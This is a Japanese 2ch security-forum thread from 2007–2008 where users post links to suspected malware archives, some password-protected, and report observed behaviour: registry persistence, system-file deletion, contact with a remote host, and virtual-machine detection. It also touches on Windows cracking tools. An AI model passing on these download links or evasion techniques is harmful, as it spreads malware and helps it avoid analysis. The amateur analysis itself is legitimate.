http://pc11.2ch.net/test/read.cgi/sec/1177848342/

735 :名無しさん@お腹いっぱい。:2007/05/18(金) 09:09:13
自分で新種見つけて、実行してるからなぁ……

736 :名無しさん@お腹いっぱい。:2007/05/18(金) 10:52:51
>>734
このスレはNOD厨の自演

737 :名無しさん@お腹いっぱい。:2007/05/21(月) 21:49:01
>>736
>>736
>>736
>>736
>>736
>>736
>>736
>>736


738 :名無しさん@お腹いっぱい。:2007/06/10(日) 17:41:58
ageますよ


739 :名無しさん@お腹いっぱい。:2007/06/11(月) 22:12:58
あげ保守

740 :名無しさん@お腹いっぱい。:2007/06/11(月) 22:14:44
インスコマンは今何処…

741 :名無しさん@お腹いっぱい。:2007/06/19(火) 22:20:05
あげとこ〜

742 :名無しさん@お腹いっぱい。:2007/06/19(火) 22:24:26
自分はZERO使っています。
ここのスレに書かれているアドレスを踏むのは無謀ですか?

743 :名無しさん@お腹いっぱい。:2007/06/20(水) 00:44:21
PHSかと思った。

744 :名無しさん@お腹いっぱい。:2007/06/20(水) 20:57:24
(^Д^)アゲ〜

745 :名無しさん@お腹いっぱい。:2007/06/27(水) 21:51:22
落とさないよ〜

(^Д^)アゲ〜

746 :名無しさん@お腹いっぱい。:2007/06/27(水) 22:25:12
最近インスコマン来てないの?

747 :インスコマン ◆0BgPFrwao2 :2007/06/29(金) 23:30:40
最近セキュ版自体見てなかった。


748 :名無しさん@お腹いっぱい。:2007/07/02(月) 12:54:22
つ[ ttp://vaxobjectsetup.com/download.php?id=4080 ]

749 :名無しさん@お腹いっぱい。:2007/07/08(日) 03:05:16
苺5 xs3133 おまけ.exe

750 :名無しさん@お腹いっぱい。:2007/07/08(日) 07:10:45
404ですた

751 :名無しさん@お腹いっぱい。:2007/07/08(日) 10:18:11
ttp://www.seagate.com/support/discwizard/DiscWizardSetup.jp.exe

752 :名無しさん@お腹いっぱい。:2007/07/08(日) 10:21:59
>>751
404ですた

753 :名無しさん@お腹いっぱい。:2007/07/08(日) 10:22:15
>>751
File Not Found (404)

754 :名無しさん@お腹いっぱい。:2007/07/08(日) 10:33:34
苺5 xs3136 おまけ.exe

755 :名無しさん@お腹いっぱい。:2007/07/08(日) 18:03:32
とりあえずエロマンガの方だけいただいて
あからさまにあやしいおまけ.exeはそのままごみ箱に捨てた

756 :名無しさん@お腹いっぱい。:2007/07/08(日) 19:16:09
>おまけ.exe

ワロタw

757 :名無しさん@お腹いっぱい。:2007/07/08(日) 19:35:24
抜き終わったのでいらないPCで実行した
素人なので細かい挙動とかわからないです

レジストリ追加
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"DoFOcyjN"="C:\\WINDOWS\\$NtUninstallKB918118$\\spuninst:DoFOcyjN.exe"

ファイル作成
C:\WINDOWS\$NtUninstallKB918118$\spuninst:DoFOcyjN.exe ?
C:\WINDOWS\$NtUninstallKB900485$\spuninst\xNrFtyhG.dll
作成されるファイル名ランダムかも

・DoFOcyjN.exe
プロセスに現れるもののエクスプローラから見えないのでいじれなかった。常駐有
・xNrFtyhG.dll
ttp://www.uploda.org/uporg894963.zip.html virus
Borland Delphi DLL おまけ.exe本体と大体同じ?

当環境では実行した瞬間からエクスプローラが重すぎて挙動不審なのでまともにPC操作できんとです
文字列見た印象では掲示板爆撃のように思えるけど、FWは特に何も言わなかった
ちゃんと動いているのか動いていないのか…

758 :名無しさん@お腹いっぱい。:2007/07/17(火) 23:24:04
http://raus.de/crashme/
よろ

759 :名無しさん@お腹いっぱい。:2007/07/18(水) 01:36:00
ブラクラかよ

760 :名無しさん@お腹いっぱい。:2007/07/19(木) 20:50:55
http://23153.gandefinkionladesun.com/pic_collection/

しばらく会話のなかったメッセの知り合いがいきなりこのアドだけ
伝えてきた…クリックしたらインストール警告画面。
知り合いはもうログアウトしちまったし…こえーよ;

761 :名無しさん@お腹いっぱい。:2007/07/19(木) 20:51:57
あ、インスト警告じゃなかった。
でもやっぱこえー;

762 :名無しさん@お腹いっぱい。:2007/07/19(木) 20:55:52
その知り合いがメッセンジャーのスパムで自己増殖するワームかなんかに感染しちゃってるんだろ。
教えてやれ。

763 :名無しさん@お腹いっぱい。:2007/07/19(木) 21:06:25
>>762
まじか…そんなスパムがあるとは知らなかった
しかし、ログインしてもメッセ到着しないんだよな、なぜか
それもスパムのせいなのかね
さてどうやって伝えるか…

764 :名無しさん@お腹いっぱい。:2007/07/19(木) 22:20:38
WarezovとかStrationとか呼ばれている奴だな

765 :名無しさん@お腹いっぱい。:2007/07/23(月) 20:41:11
age


766 :名無しさん@お腹いっぱい。:2007/07/23(月) 21:59:42
     ,ハ,,,ハ
    (,,・ω・)  キーコキコ
 〜  。(_ ゚T゚
.     ゚ ゚̄

767 :名無しさん@お腹いっぱい。:2007/07/24(火) 02:23:04
和んだ

768 :名無しさん@お腹いっぱい。:2007/07/24(火) 20:59:04
苺70 bh3744 keyもpassも  kamo

愚弟が愚友から提供(CDRで)を受けて何も考えずクリック。
ファイルは典型的な 「偽ファイル名.( 空 白 ).exe」型が4ヶ。
ただノートン、マカフィともに無反応でスルー。新種?それとも出来損ないファイル?
感染(?)機をネット遮断して起動させてみたもののさしあたり特別な挙動はないかんじだが。

説教で終わらすにしろ、再インスコさせるにしろ、挙動がわかれば嬉しいです。

769 :名無しさん@お腹いっぱい。:2007/07/24(火) 21:47:09
つ http://research.sunbelt-software.com/submit.aspx

770 :名無しさん@お腹いっぱい。:2007/07/25(水) 04:00:44
うpが無いんではどうしようも

771 :名無しさん@お腹いっぱい。:2007/07/25(水) 09:08:30
>>768
すべてのファイルを実行したんだとすると危険だったような
単一ファイルじゃなにもおきないタイプだったと思う

772 :名無しさん@お腹いっぱい。:2007/07/25(水) 13:22:16
>>768
readme.txt .exe だけ反応した。
ttp://www.virustotal.com/resultado.html?0b4d624178bb84b81be1a99a413f896b

773 :名無しさん@お腹いっぱい。:2007/07/27(金) 23:34:32
>>771>>772
ありがとう。1つクリックしただけみたいなので、説教の上
残存価額支払いまではPCリビング固定の刑に処することにするよ。

774 :名無しさん@お腹いっぱい。:2007/07/29(日) 16:31:25
あやしいファイル実行するのって一つの趣味?

775 :名無しさん@そうだ選挙に行こう:2007/07/29(日) 16:55:37
と研究だろ

776 :名無しさん@お腹いっぱい。:2007/07/31(火) 11:24:25
履歴書に書いてもおk

777 :名無しさん@お腹いっぱい。:2007/08/16(木) 04:23:58
貼っておきますね

563 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:2007/08/16(木) 04:18:49 ID:YvGrkCHp0
本当はこっちに書きたかったんですけど
アクセス規制されててかけないので
こちらに書かせて頂きますm(__)m

あやしいファイルを実行するスレ
http://pc11.2ch.net/test/read.cgi/sec/1140517079/

スレ違いで申し訳ないんですが
コイツがあやしいのです
ttp://a-draw.com/contents/uploader3/src/up0105.lzh.html

pass:deepp

mp3なんですけど、右クリックするとそのまま固まるんです
情報をポップアップしようとするとフォルダが閉じるし
単に壊れてるファイルなんでしょうか?

778 :名無しさん@お腹いっぱい。:2007/08/16(木) 05:46:09
>>777
特に問題ない。
mp3infopとか、右クリックで表示されるメニューの中のどれかのソフトが問題なんじゃない?

779 :名無しさん@お腹いっぱい。:2007/08/16(木) 06:24:29
>>777
ロダの仕様なのかブラウザ経由だと壊れた書庫の状態で落ちてきた
解凍前にファイルサイズが合ってるか確認すれ

中身は同じく問題無し

780 :名無しさん@お腹いっぱい。:2007/08/16(木) 20:45:40
http://www6.uploader.jp/dl/cjhs84/cjhs84_uljp00107.zip.html

実行お願いします

781 :名無しさん@お腹いっぱい。:2007/08/17(金) 01:43:50
チーターは巣に帰れ。

782 :名無しさん@お腹いっぱい。:2007/08/30(木) 13:14:53
http://11731.kit.carpediem.fr/BT-Bukkake.exe

783 :名無しさん@お腹いっぱい。:2007/08/30(木) 16:47:12
>782
アプリケーションの新規ファイル作成時にイベントが発生しました
C:\Program Files\Mozilla Firefox\firefox.exe.
ファイルは隔離されましたESET社へファイルを提出してください

ttp://www7.uploader.jp/dl/maru/maru_uljp00061.jpg.html


784 :名無しさん@お腹いっぱい。:2007/08/30(木) 17:01:11
ポルノウェア
not-a-virus:Porn-Dialer.Win32.CapreDeam.p

785 :名無しさん@お腹いっぱい。:2007/08/30(木) 17:09:22
鑑定スレじゃないんだから、実行しろよ。
インスコマーーーーン!!

786 :インスコマン ◆qlwUrCXXtM :2007/08/30(木) 22:51:11
>>783
なんかマカヒーが常駐してるみたいなんだけど
違うかな・・・


787 :インスコマン ◆qlwUrCXXtM :2007/08/30(木) 22:53:59
訂正
SiteAdvisorか

788 :名無しさん@お腹いっぱい。:2007/09/22(土) 16:27:43
このスレ埋めないか

789 :名無しさん@お腹いっぱい。:2007/09/23(日) 13:43:34
過疎スレ埋め

790 :名無しさん@お腹いっぱい。:2007/09/23(日) 13:44:54
過疎スレ埋め

791 :名無しさん@お腹いっぱい。:2007/09/23(日) 13:46:37
今度なんかもってきていいですか?

792 :名無しさん@お腹いっぱい。:2007/09/23(日) 18:55:38
だが断る

793 :名無しさん@お腹いっぱい。:2007/10/03(水) 03:19:39
無料常駐系のオススメって何かある?
前までPestPatrol2005入れてたんだけど、この度OS再インスコで消えてもーた
もう本家では配布してないし
どうしよう

794 :名無しさん@お腹いっぱい。:2007/10/03(水) 03:20:13
>>793
またお前か

795 :名無しさん@お腹いっぱい。:2007/10/03(水) 03:25:39
>>794
無料常駐系のオススメって何かある?
前までPestPatrol2005入れてたんだけど、この度OS再インスコで消えてもーた
もう本家では配布してないし
どうしよう

796 :名無しさん@お腹いっぱい。:2007/10/03(水) 03:34:14
>>795
無料常駐系のオススメって何かある?
前までPestPatrol2005入れてたんだけど、この度OS再インスコで消えてもーた
もう本家では配布してないし
どうしよう

797 :名無しさん@お腹いっぱい。:2007/10/03(水) 03:39:07
>>796
無料常駐系のオススメって何かある?
前までPestPatrol2005入れてたんだけど、この度OS再インスコで消えてもーた
もう本家では配布してないし
どうしよう

798 :名無しさん@お腹いっぱい。:2007/10/03(水) 23:14:28
そういや、NOD厨はPestPatrol信者も兼ねていたね。

799 :名無しさん@お腹いっぱい。:2007/10/05(金) 16:40:32
http://www.uploda.net/cgi/uploader1/index.php?file_id=0000257485.exe

実行してしまいました。
何が起こるか教えてください。

800 :名無しさん@お腹いっぱい。:2007/10/05(金) 22:49:27
実行したならわかるだろ?

801 :名無しさん@お腹いっぱい。:2007/10/13(土) 09:33:12
ワロタ

802 :名無しさん@お腹いっぱい。:2007/10/16(火) 14:51:44
埋め

803 :名無しさん@お腹いっぱい。:2007/10/17(水) 13:01:40
http://www11.axfc.net/uploader/20/so/He_40143.rar.html

変わりに実行してもらえませんか? pw sfdx

804 :名無しさん@お腹いっぱい。:2007/10/17(水) 14:43:57
Trojan.Win32.KillWin
\windows\system32\hal.dll を削除してシャットダウン実行。

805 :名無しさん@お腹いっぱい。:2007/10/17(水) 15:10:32
dr.webのリンクチェッカーでここに出てきたサイト
チェックしたけど全部CLEANとかなるんですけど?
これってDr.WEBが代わりにそのリンクにつないで
ウイルスがあるかないかチェックしてるんじゃないの?


806 :名無しさん@お腹いっぱい。:2007/10/17(水) 15:14:14
>>804 有難うございます!あぶなかった!

807 :名無しさん@お腹いっぱい。:2007/10/17(水) 18:03:28
>>803
>>781

808 :名無しさん@お腹いっぱい。:2007/10/20(土) 13:08:08
アンチウイルスソフト反応なし。
ttp://upload2.dyndns.org/up/4/_/jump/1191704740.zip/attatch
pass お借り致します


よろしくです〜

809 :名無しさん@お腹いっぱい。:2007/10/20(土) 17:22:29
>>808
ttp://www.virustotal.com/resultado.html?e2b091f83e3f7a6bf1e6fb788b727a9b
Result: 0/32 (0%)

810 :名無しさん@お腹いっぱい。:2007/10/21(日) 00:29:51
>>808
セキュ版は高校生と中学生しかいないから実行出来るような強者はいないよ
AA貼るくらいしか出来ないから

811 :名無しさん@お腹いっぱい。:2007/10/21(日) 06:57:40
スクラップしておかないとな

812 :808:2007/10/21(日) 14:54:24
そうなのかw
確かにろくな書き込みがないww
セキュリティ板使えねーwwww

813 :名無しさん@お腹いっぱい。:2007/10/21(日) 16:37:54
ビビって実行も出来ない人間に使っていただく板でもありませんし

814 :名無しさん@お腹いっぱい。:2007/10/21(日) 19:04:28
スペシャルフォースのチートばっかだしな。

815 :名無しさん@お腹いっぱい。:2007/10/21(日) 23:17:26
ログ読み終えた感想。
インスコマン素敵。抱かれたい。

816 :名無しさん@お腹いっぱい。:2007/10/22(月) 00:07:48
ここは鑑定スレじゃないってのに

817 :名無しさん@お腹いっぱい。:2007/10/22(月) 00:54:04
いいえ。鑑定スレです。

818 :名無しさん@お腹いっぱい。:2007/10/22(月) 17:56:01
鑑定しか出来ないやつしかいないから仕方ない。
Virtual PCとか使ってるやついないの?
ここ↓
http://www.microsoft.com/downloads/details.aspx?FamilyId=21EABB90-958F-4B64-B5F1-73D0A413C8EF&displaylang=en
でIE test用で無料公開されてるXPダウソしてVirtual PCで動かせば
誰でも仮想環境手に入るよ。Windowsの更新は出来んけど感染実験は
普通に出来るから問題ない

819 :名無しさん@お腹いっぱい。:2007/10/22(月) 17:58:43
情報少なすぎて踏む気がしない

820 :名無しさん@お腹いっぱい。:2007/10/22(月) 18:59:22
NTTのセキュリティー対策ソフトが2008になるのはいつごろ?

821 :名無しさん@お腹いっぱい。:2007/10/22(月) 19:47:40
プロバイダ板で聞けよ

822 :名無しさん@お腹いっぱい。:2007/10/22(月) 20:05:06
>>818
お前が導入して鑑定しろ。
VMware持ってるけど面倒くせえ。
とりわけ>>808に関しては実行する価値が皆無。

823 :名無しさん@お腹いっぱい。:2007/10/22(月) 20:35:03
PC余ってるけど使う気しないんだよな。まさかの時の為に金くれるって言うなら実行してやってもいいけど。
それよりもまだアングラ(死語)気取りの厨房がいるって事自体に驚きだww

824 :名無しさん@お腹いっぱい。:2007/10/22(月) 22:21:38
どうすればここ盛り上がるんだ?

825 :名無しさん@お腹いっぱい。:2007/10/22(月) 22:23:28
別に盛り上げる必要とかないから

826 :青春たろう:2007/10/22(月) 22:32:01
なんでだよ・・・
思い出とかつくりてぇじゃねぇかよ!!
お前らこれでいいのかよっ!

827 :名無しさん@お腹いっぱい。:2007/10/22(月) 23:21:19
だってもう夏は終わったし

828 :名無しさん@お腹いっぱい。:2007/10/22(月) 23:26:01
>>825
お前文化祭行かないタイプだな

829 :名無しさん@お腹いっぱい。:2007/10/25(木) 05:08:19
ttp://www3.uploader.jp/dl/akaiup/akaiup_uljp01343.zip.html
うpろだで見つけて興味本位でダブルクリックしてみたんですが、何もおきませんでした。
ノートンやVirusTotalでも反応無しです。
ただ、起動したときに一瞬だけコマンドプロンプトが起動したようなしなかったような。
結局何かわからずじまいなので、どういったものかわかる方がいればお願いします。

830 :名無しさん@お腹いっぱい。:2007/10/25(木) 05:35:59
↑PASSWDくらい書けこのカスw

831 :名無しさん@お腹いっぱい。:2007/10/25(木) 11:13:22
すみません、パスはfurutinです。

832 :名無しさん@お腹いっぱい。:2007/10/25(木) 22:51:05
デカ過ぎて解析する気にならん。

833 :名無しさん@お腹いっぱい。:2007/10/26(金) 00:05:22
残念。
今のとこPCに問題は出てないんですよね・・・。なんなんだろ

834 :名無しさん@お腹いっぱい。:2007/10/26(金) 15:28:07
C:\Windows\winhttp.dllにアクセスして何かするみたいだけど
俺のパソコンにwinhttp.dllが存在しないので、そのまま何もしないで終了したっぽい

835 :名無しさん@お腹いっぱい。:2007/10/27(土) 02:59:06
>>834
ありがとう。
PC内の個人情報送るとかそういう類のモノかもしれないですね

836 :名無しさん@お腹いっぱい。:2007/12/06(木) 10:46:52
ttp://cowscorpion.com/dl/x264.html
これの一番上をおねがいします。

837 :名無しさん@お腹いっぱい。:2007/12/08(土) 15:04:17
>>836
ただのコーデックじゃん

838 :名無しさん@お腹いっぱい。:2007/12/11(火) 02:45:31
ttp://2up.pgrup.net/uploader/download/1197306644.zip
お願いします

839 :名無しさん@お腹いっぱい。:2007/12/11(火) 04:12:53
>>838
ttp://www.virustotal.com/jp/resultado.html?2c4553a9d5f04ba3892a7f56cacb8dc8

840 :名無しさん@お腹いっぱい。:2007/12/11(火) 18:08:07
>>839
すいません。
ファイルを受理中となるだけでよく分かりません。
どういうことなんでしょうか?

841 :名無しさん@お腹いっぱい。:2007/12/16(日) 02:39:20
ttp://zenyrskin.innori.com/attachment/gk3.zip
なんでしょうコレ

842 :名無しさん@お腹いっぱい。:2007/12/20(木) 18:45:55
何このスレ
ウィルス集めに最適じゃんお前らお疲れ様です

843 :名無しさん@お腹いっぱい。:2007/12/31(月) 18:15:30
http://ktkr.vip2ch.com/upload.cgi?mode=dl&file=16595

鑑定お願いします
ファイル名:svchot.exe
圧縮してあります
容量 11.6MB
発見場所
C:\WINDOWS\SYSTEM32\MICROSOFT

とっても不安ですorz

844 :名無しさん@お腹いっぱい。:2008/01/02(水) 03:01:34
ダウソできねえよ?

845 :名無しさん@お腹いっぱい。:2008/01/02(水) 03:09:15
というかなんで、そんなファイルダウソしようとしたの?
「発見場所」って、winユーザーでそのファイルが無い人は
多分居ないよ。

846 :名無しさん@お腹いっぱい。:2008/01/02(水) 18:26:41
正規のsvchost.exeはその1つ上のディレクトリにあるもののはずだが
つまりsvchost.exeを偽装したウィルスの可能性は十分ある

847 :名無しさん@お腹いっぱい。:2008/01/30(水) 01:15:16
ttp://tweak-ui-powertoy.jp.brothersoft.com/download/
ここからDownloadできるTweak UI のインチキくさいセットアップファイル


848 :名無しさん@お腹いっぱい。:2008/01/30(水) 17:31:28
>>847
変なサイトを経由してはいるが、最終的に手に入るバイナリは
マイクロソフトのサイトにおいてあるしデジタル署名もついている

849 :名無しさん@お腹いっぱい。:2008/02/24(日) 17:29:19
ホッシュ

850 :名無しさん@お腹いっぱい。:2008/03/03(月) 08:41:23
http://www.uploader.jp/dl/oklsslv2ym/oklsslv2ym_uljp00068.zip.html

パスabcde

pornoplayersetupexe

海外の闇のアダルト業界が総力を結集して開発した
ポルノメディアプレイヤー
アンチウイルスソフトではスパイウエアとして検知される

参考URL
http://www.shareedge.com/spywareguide/product_show.php?id=3582

851 :名無しさん@お腹いっぱい。:2008/03/03(月) 13:17:18
>>850
http://www.virustotal.com/analisis/baa35c4fbd394b9e1f377ed395851cb0

852 :v2y:2008/03/03(月) 16:38:33
これ、最後に出てくるMP3ってFlashか

…exe全然関係ナスwww



ところでポルノどこ?(バーボン風

853 :名無しさん@お腹いっぱい。:2008/03/11(火) 04:40:37
http://enjoi.blogdns.net/up/src/2302.lzh

854 :v2y:2008/03/12(水) 03:03:17
たぶん、どっかから拾ってきたフラゲをexeにして、
アドウェア2個と抱き合わせにしたやつぽい
フラだけ抽出して圧縮したら、330KBになった

アドウェアは明日からのんびり覗いてみる

855 :名無しさん@お腹いっぱい。:2008/03/13(木) 14:38:09
ttp://www5.uploader.jp/dl/tane/tane_uljp00311.zip.html
パス:virus


856 :名無しさん@お腹いっぱい。:2008/03/14(金) 11:26:36
検出可否スレも見てる

休憩時間に、とりあえず0だけ踏んでみた
手抜きしてるんもあるんだが、うまく感染させられなかった
無理矢理実行してみたが、なんかアンケート画面(日本語英語じゃない)みたいのの
URLを見に行こうとして、それ以上進めない

857 :名無しさん@お腹いっぱい。:2008/03/14(金) 16:56:28
821 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2008/03/13(木) 16:37:27

ttp://www5.uploader.jp/dl/tane/tane_uljp00309.zip.html
Malware-Pack27

感染が怖いなら右クリ(ry


858 :名無しさん@お腹いっぱい。:2008/03/14(金) 16:57:01
887 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2008/03/14(金) 16:07:23
お題
ttp://www.lineagecojp.com/movie/mov0028.zip

パスはないのでダウンロード後の扱いに注意してね

859 :名無しさん@お腹いっぱい。:2008/03/14(金) 18:23:19
http://updas.net/up/download/1205455546.zip
p:vip

次はこれかw


860 :名無しさん@お腹いっぱい。:2008/03/15(土) 00:30:09
http://updas.net/up/download/1205455546.zip
p:vip

次はこれかw

861 :名無しさん@お腹いっぱい。:2008/03/15(土) 00:39:30
913 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2008/03/15(土) 00:17:44
お題!?
http://www5.uploader.jp/dl/tane/tane_uljp00312.zip.html
pass:virus


862 :名無しさん@お腹いっぱい。:2008/03/15(土) 14:20:06
922 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2008/03/15(土) 11:46:28
問題のトレンドマイクロのHPに埋め込まれたウイルスです

http://www5.uploader.jp/dl/tane/tane_uljp00310.rar.html

パス:TM

日本時間:15日8時頃
JS_IFRAME.JZ
http://www.virustotal.com/jp/analisis/804298425d6ccfb4383f1af93a7c6634
JS_DLOADER.TZE
http://www.virustotal.com/jp/analisis/933edad4836834738edd51b8561fb542



863 :名無しさん@お腹いっぱい。:2008/03/15(土) 21:19:05
926 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2008/03/15(土) 21:03:40
お題
http://www5.uploader.jp/dl/tane/tane_uljp00313.zip.html
p:messenger

現時点ではカスペやAVGですら検知できてません。

864 :名無しさん@お腹いっぱい。:2008/03/16(日) 12:54:16
940 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2008/03/16(日) 12:19:06
ttp://www5.uploader.jp/dl/tane/tane_uljp00314.zip.html
virus

次はこれかw

865 :名無しさん@お腹いっぱい。:2008/03/16(日) 21:12:45
956 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2008/03/16(日) 19:59:45
>>949の修正版
ttp://www5.uploader.jp/dl/tane/tane_uljp00317.zip.html
virus

866 :名無しさん@お腹いっぱい。:2008/03/16(日) 23:05:30
なんで
【ソースネクスト/K7】ウイルスセキュリティZERO pert18
http://pc11.2ch.net/test/read.cgi/sec/1201032031/
からコピペしてんの?

867 :名無しさん@お腹いっぱい。:2008/03/17(月) 16:11:28
休み時間に、またちょっとつついてみた

>>862
現在は: ダウソ先がつながんない
てかこれ、itmediaで見たときには、すでにつながんなかったんだな

>>863
難読化が少なくとも3層かかってる
サービスぽい名前のコピーを作って、自分は終了する
コピーが*.cybernix.info:8888につなごうとしてた
これはテーブルに書いてあるようで、容易に変更できるようにしているのかと
ちょっとパケット覗けないPC状況だったので、そっからは覗けてない

メッセがCreateInstance()で操作できるってのは、やっぱり罪なことなのかなと

いずれも有害ははっきりしてるものだしってことで、
のんびり、踏んでみたのは うんちく程度にレポする

868 :名無しさん@お腹いっぱい。:2008/03/18(火) 14:15:45
115 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2008/03/18(火) 13:55:29
ちょい古いけどまとめたもの。
http://www.dotup.org/uploda/www.dotup.org5768.zip.html
pass:virus
988 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2008/03/18(火) 14:00:27
ちょい古いけどまとめたもの。
http://www.dotup.org/uploda/www.dotup.org5768.zip.html
pass:virus

869 :名無しさん@お腹いっぱい。:2008/03/19(水) 12:18:56
11 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2008/03/19(水) 10:45:10
virus
http://www5.uploader.jp/dl/tane/tane_uljp00319.zip.html

次はこれかw

870 :名無しさん@お腹いっぱい。:2008/03/20(木) 00:37:59
>>869 Flashのほう

IEで ttp://br.youtube.com/watch?v=FGoGb1aYpbc を開いている間に、
偽IE, 偽ノートン(名前だけ。Delphiのアイコンのままだ), 偽メッセが落ちてくる
それぞれ、どっかの銀行の垢抜き、orkutの垢抜き、自分(偽flash9)の流布をしてるんだろう
だろう、っていうのは、中覗いててきとーに予想したことなので なにしろ英語でもないし
これらはtinyurlを経由して指定されていて、平文のexeだ

871 :名無しさん@お腹いっぱい。:2008/03/20(木) 01:04:01
>>869 もういっこのほう

なんか処理してるっぽい画面が出た後、
IEで ttp://www.receita.fazenda.gov.br/Aplicacoes/ATCTA/cpf/ConsultaPublica.aspを表示
ぼーっとしてるまに、exeが2個落ちてくる
httpで手短に送信したあと、こんどはどっかにftpでつなごうとするところまで見た

872 :名無しさん@お腹いっぱい。:2008/03/24(月) 09:15:02
インスコマン……(;´д⊂ヽ

873 :名無しさん@お腹いっぱい。:2008/03/24(月) 09:44:32
スレ維持しておけば、帰ってきはるかと

874 :名無しさん@お腹いっぱい。:2008/03/26(水) 20:21:39
あげ

875 :インスコマン ◆qlwUrCXXtM :2008/03/27(木) 10:22:28
>>873
まだ覚えてくれている人がいたんですね

>>873
コテ使わないでセキュ板見てます

>>870-871
乙。

876 :名無しさん@お腹いっぱい。:2008/03/27(木) 10:33:11
キター

877 :名無しさん@お腹いっぱい。:2008/04/08(火) 04:24:51
noop

878 :名無しさん@お腹いっぱい。:2008/04/09(水) 00:10:18
bochs

879 :名無しさん@お腹いっぱい。:2008/04/11(金) 09:02:46
http://www5.uploader.jp/dl/tane/tane_uljp00030.exe.html
pass12345

バーチャルガール?

880 :名無しさん@お腹いっぱい。:2008/04/11(金) 18:20:56
yourfilehostなんかの広告にでてくるvirtualgirlってやつだと思います
いま最新版落としてきたら、完全一致しました

インスコしたことがあります そのときは、微エロ系デスクトップマスコットでした
初期データセット(無料分)、本体、関係DLLなど、とにかく大量にダウソしてくるです
無料のマスコットセットがいくつか付いてきて、そろえるには購入が必要という手合いです
メアド登録して垢をとらされます
そこに、追加購入したセット、期間限定で取得したセットが紐づけられます

ありがちな、別添アドウェア、別添トロイはなかったぽかったですが、
bbspinkに慣れた人なら、とびついて使うようなもんでもないかも

881 :名無しさん@お腹いっぱい。:2008/04/18(金) 06:52:13
ttp://uproda.2ch-library.com/src/lib021724.zip

解凍後のexeアプリケーションを実行しましたが問題ないでしょうか。
鑑定をお願いします

882 :名無しさん@お腹いっぱい。:2008/04/18(金) 11:58:21
いまどきexeちょっと踏んだくらいでは、安全の保証ってできかねますけどね
明らかに有害か、ちょっと踏んでみた限りでは脅威がなさげか、所詮そのどっちかです

>>881
クラックツールです 「これってなんですか?」に準じて対応。

MGADiag.exe
MS純正のWGA診断ツールのようです 一応署名されています v1.5系。最新ではありません
実行するとネットにアクセスします 通常どおりWGAを試みているのでしょう

keyfinder.exe
www.magicaljellybean.comで配っているkeyfinderです 最新ではありません
公式に配布している旧バージョンと一致しました 自己解凍書庫だったりするのは仕様です
レジストリに記録されているキーを収集してくれるみたいです
キーの書き換え機能もあります 書庫の中の.vbsファイルを覗けばわかりますが、案外素直。

wga-fix.exe
hostsファイルを操作して、WGAへの通報を抑制しようとしているのでしょう
意図はわからんではないのですが、効果が今でもあるのかは存じかねます
安全鑑定はいたしかねます コピを是認する方に委ねます

Windows XP Keygen.exe
よくわからない計算をして、キーらしきものを吐きます
安全鑑定はいたしかねます コピを是認する方に委ねます

883 :881:2008/04/18(金) 12:05:42
ありがとうございます。

“コピを是認する方”はここにはいないということでしょうか

884 :名無しさん@お腹いっぱい。:2008/04/18(金) 12:47:23
割れ厨はダウソ板にでも行ってください

885 :名無しさん@お腹いっぱい。:2008/04/18(金) 13:06:33
あやしいファイルには違いないわな

886 :881:2008/04/18(金) 22:36:49
コピ の意味が判らずに書き込んでしまいました。
あと 割れ厨 の意味も判りません。
ご教示ください。

887 :名無しさん@お腹いっぱい。:2008/04/18(金) 22:38:44
首つって氏ね

888 :名無しさん@お腹いっぱい。:2008/04/18(金) 23:07:42
淡々とマジレス

コピ: 違法コピー。
割れ厨: この場合、先方の主義に関わらず自らの違法コピーを推進しようとする人々。

2ちゃんねるにはいろんな人がおり、コピに対する姿勢は様々ですが
コピを暗黙であれ、容認するスレ以外では、あんまりコピの話はしないほうがいいわけです

そのファイルを積極的に踏んだのであればいうまでもなく、だまされて踏まされたとしても、
そのファイルをOKと鑑定しても、NGと鑑定しても、割れ厨さんに寄与してしまいますので、
コピに容認な人も否認な人もまじってるこの板では、なんともいうてさしあげられかねます

あと888げと

889 :881:2008/04/19(土) 00:35:17
ありがとうございました

890 :名無しさん@お腹いっぱい。:2008/04/20(日) 00:56:12
このスレの住人って当然、仮想マシン(VmWare VirtualPC)から
ファイル実行してんだよね。じゃなきゃ怖くてそんなことできない。


891 :名無しさん@お腹いっぱい。:2008/04/20(日) 02:08:00
むしろ普通にVPC/VMWare上で実行は×
仮想マシンよけが実装されてることが増えてる

892 :名無しさん@お腹いっぱい。:2008/04/20(日) 02:33:35
>>891
仮想マシンよけ?
一体、どういう原理で仮想マシンか否か識別してるわけ?


893 :名無しさん@お腹いっぱい。:2008/04/20(日) 02:44:28
VMWareにせよ、VPCにせよ、高速化する専用ドライバとかいれるでしょ
ああいうのを検出すればいい これはカンタン
あと、(仮想マシン上に)rootkitが入ったときに、CPUの使用方法が通常モードと違うから、
これを検出したら、悪意ある行動をやめるか、遅らせるとかするといい


894 :京北高等学校の植野公友:2008/04/21(月) 20:47:41
?????????????????????????????????????????????????????
?????????????????????????????????????????????????????
?????????????????????????????????????????????????????
?????????????????????????????????????????????????????
?????????????????????????????????????????????????????
?????????????????????????????????????????????????????
?????????????????????????????????????????????????????
?????????????????????????????????????????????????????
?????????????????????????????????????????????????????
?????????????????????????????????????????????????????
?????????????????????????????????????????????????????
?????????????????????????????????????????????????????
?????????????????????????????????????????????????????
?????????????????????????????????????????????????????
?????????????????????????????????????????????????????
?????????????????????????????????????????????????????
?????????????????????????????????????????????????????
?????????????????????????????????????????????????????

895 :名無しさん@お腹いっぱい。:2008/06/14(土) 15:19:45
http://www1.axfc.net/uploader/He/so/109598.exe

これをじっこうするとハルヒというのがでました。ウイルスですか?NOD32では検出されません。


896 :名無しさん@お腹いっぱい。:2008/06/14(土) 15:21:50
キーワードは 1 です



897 :名無しさん@お腹いっぱい。:2008/06/14(土) 22:45:57
レジストリを書き換えて、毎度実行するようにはなるみたいです
タスクマネージャの起動の抑制もかかります あと音がでます
無害でも無益です 踏まない方がいいでしょう

898 :名無しさん@お腹いっぱい。:2008/06/20(金) 23:04:02
>>895
